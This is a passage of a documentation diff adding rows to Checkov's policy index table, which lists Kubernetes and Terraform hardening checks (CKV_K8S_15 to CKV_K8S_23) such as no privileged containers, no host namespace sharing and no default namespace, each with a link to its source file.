[ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 2615 | CKV_K8S_15 | resource | kubernetes_pod | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 2616 | CKV_K8S_15 | resource | kubernetes_pod_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 2617 | CKV_K8S_16 | resource | CronJob | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2618 | CKV_K8S_16 | resource | DaemonSet | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2619 | CKV_K8S_16 | resource | Deployment | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2620 | CKV_K8S_16 | resource | DeploymentConfig | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2621 | CKV_K8S_16 | resource | Job | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2622 | CKV_K8S_16 | resource | Pod | Container should not be privileged | Kubernetes | 
[PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2623 | CKV_K8S_16 | resource | PodTemplate | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2624 | CKV_K8S_16 | resource | ReplicaSet | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2625 | CKV_K8S_16 | resource | ReplicationController | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2626 | CKV_K8S_16 | resource | StatefulSet | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2627 | CKV_K8S_16 | resource | kubernetes_deployment | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 2628 | CKV_K8S_16 | resource | kubernetes_deployment_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 2629 | CKV_K8S_16 | resource | kubernetes_pod | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 2630 | CKV_K8S_16 | resource | kubernetes_pod_v1 | Do not admit privileged containers | Terraform | 
[PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 2631 | CKV_K8S_17 | resource | CronJob | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2632 | CKV_K8S_17 | resource | DaemonSet | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2633 | CKV_K8S_17 | resource | Deployment | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2634 | CKV_K8S_17 | resource | Job | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2635 | CKV_K8S_17 | resource | Pod | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2636 | CKV_K8S_17 | resource | ReplicaSet | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2637 | CKV_K8S_17 | resource | ReplicationController | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2638 | CKV_K8S_17 | resource | StatefulSet | Containers should not share the host process ID namespace | Kubernetes | 
[ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2639 | CKV_K8S_17 | resource | kubernetes_deployment | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 2640 | CKV_K8S_17 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 2641 | CKV_K8S_17 | resource | kubernetes_pod | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 2642 | CKV_K8S_17 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 2643 | CKV_K8S_18 | resource | CronJob | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2644 | CKV_K8S_18 | resource | DaemonSet | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2645 | CKV_K8S_18 | resource | Deployment | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2646 | CKV_K8S_18 | resource | Job | Containers should not share 
the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2647 | CKV_K8S_18 | resource | Pod | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2648 | CKV_K8S_18 | resource | ReplicaSet | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2649 | CKV_K8S_18 | resource | ReplicationController | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2650 | CKV_K8S_18 | resource | StatefulSet | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2651 | CKV_K8S_18 | resource | kubernetes_deployment | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 2652 | CKV_K8S_18 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 2653 | CKV_K8S_18 | resource | kubernetes_pod | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 2654 | CKV_K8S_18 | resource | kubernetes_pod_v1 | Do not admit 
containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 2655 | CKV_K8S_19 | resource | CronJob | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2656 | CKV_K8S_19 | resource | DaemonSet | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2657 | CKV_K8S_19 | resource | Deployment | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2658 | CKV_K8S_19 | resource | Job | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2659 | CKV_K8S_19 | resource | Pod | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2660 | CKV_K8S_19 | resource | ReplicaSet | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2661 | CKV_K8S_19 | resource | ReplicationController | Containers should not share the host network namespace | Kubernetes | 
[SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2662 | CKV_K8S_19 | resource | StatefulSet | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2663 | CKV_K8S_19 | resource | kubernetes_deployment | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 2664 | CKV_K8S_19 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 2665 | CKV_K8S_19 | resource | kubernetes_pod | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 2666 | CKV_K8S_19 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 2667 | CKV_K8S_20 | resource | CronJob | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2668 | CKV_K8S_20 | resource | DaemonSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | 
[AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2669 | CKV_K8S_20 | resource | Deployment | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2670 | CKV_K8S_20 | resource | DeploymentConfig | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2671 | CKV_K8S_20 | resource | Job | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2672 | CKV_K8S_20 | resource | Pod | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2673 | CKV_K8S_20 | resource | PodTemplate | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2674 | CKV_K8S_20 | resource | ReplicaSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2675 | CKV_K8S_20 | resource | ReplicationController | Containers should not run with allowPrivilegeEscalation | Kubernetes | 
[AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2676 | CKV_K8S_20 | resource | StatefulSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2677 | CKV_K8S_20 | resource | kubernetes_deployment | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 2678 | CKV_K8S_20 | resource | kubernetes_deployment_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 2679 | CKV_K8S_20 | resource | kubernetes_pod | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 2680 | CKV_K8S_20 | resource | kubernetes_pod_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 2681 | CKV_K8S_21 | resource | ConfigMap | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2682 | CKV_K8S_21 | resource | CronJob | The default namespace should not be used | Kubernetes | 
[DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2683 | CKV_K8S_21 | resource | DaemonSet | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2684 | CKV_K8S_21 | resource | Deployment | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2685 | CKV_K8S_21 | resource | Ingress | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2686 | CKV_K8S_21 | resource | Job | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2687 | CKV_K8S_21 | resource | Pod | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2688 | CKV_K8S_21 | resource | ReplicaSet | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2689 | CKV_K8S_21 | resource | ReplicationController | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2690 | CKV_K8S_21 | resource | Role | The default namespace should not be used | Kubernetes | 
[DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) |
+| 2691 | CKV_K8S_21 | resource | RoleBinding | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) |
+| 2692 | CKV_K8S_21 | resource | Secret | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) |
+| 2693 | CKV_K8S_21 | resource | Service | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) |
+| 2694 | CKV_K8S_21 | resource | ServiceAccount | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) |
+| 2695 | CKV_K8S_21 | resource | StatefulSet | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) |
+| 2696 | CKV_K8S_21 | resource | kubernetes_config_map | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2697 | CKV_K8S_21 | resource | kubernetes_config_map_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2698 | CKV_K8S_21 | resource | kubernetes_cron_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2699 | CKV_K8S_21 | resource | kubernetes_cron_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2700 | CKV_K8S_21 | resource | kubernetes_daemon_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2701 | CKV_K8S_21 | resource | kubernetes_daemonset | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2702 | CKV_K8S_21 | resource | kubernetes_deployment | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2703 | CKV_K8S_21 | resource | kubernetes_deployment_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2704 | CKV_K8S_21 | resource | kubernetes_ingress | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2705 | CKV_K8S_21 | resource | kubernetes_ingress_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2706 | CKV_K8S_21 | resource | kubernetes_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2707 | CKV_K8S_21 | resource | kubernetes_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2708 | CKV_K8S_21 | resource | kubernetes_pod | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2709 | CKV_K8S_21 | resource | kubernetes_pod_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2710 | CKV_K8S_21 | resource | kubernetes_replication_controller | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2711 | CKV_K8S_21 | resource | kubernetes_replication_controller_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2712 | CKV_K8S_21 | resource | kubernetes_role_binding | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2713 | CKV_K8S_21 | resource | kubernetes_role_binding_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2714 | CKV_K8S_21 | resource | kubernetes_secret | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2715 | CKV_K8S_21 | resource | kubernetes_secret_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2716 | CKV_K8S_21 | resource | kubernetes_service | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2717 | CKV_K8S_21 | resource | kubernetes_service_account | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2718 | CKV_K8S_21 | resource | kubernetes_service_account_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2719 | CKV_K8S_21 | resource | kubernetes_service_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2720 | CKV_K8S_21 | resource | kubernetes_stateful_set | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2721 | CKV_K8S_21 | resource | kubernetes_stateful_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
+| 2722 | CKV_K8S_22 | resource | CronJob | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) |
+| 2723 | CKV_K8S_22 | resource | DaemonSet | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) |
+| 2724 | CKV_K8S_22 | resource | Deployment | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) |
+| 2725 | CKV_K8S_22 | resource | DeploymentConfig | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) |
+| 2726 | CKV_K8S_22 | resource | Job | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) |
+| 2727 | CKV_K8S_22 | resource | Pod | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) |
+| 2728 | CKV_K8S_22 | resource | PodTemplate | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) |
+| 2729 | CKV_K8S_22 | resource | ReplicaSet | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) |
+| 2730 | CKV_K8S_22 | resource | ReplicationController | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) |
+| 2731 | CKV_K8S_22 | resource | StatefulSet | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) |
+| 2732 | CKV_K8S_22 | resource | kubernetes_deployment | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) |
+| 2733 | CKV_K8S_22 | resource | kubernetes_deployment_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) |
+| 2734 | CKV_K8S_22 | resource | kubernetes_pod | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) |
+| 2735 | CKV_K8S_22 | resource | kubernetes_pod_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) |
+| 2736 | CKV_K8S_23 | resource | CronJob | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) |
+| 2737 | CKV_K8S_23 | resource | DaemonSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) |
+| 2738 | CKV_K8S_23 | resource | Deployment | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) |
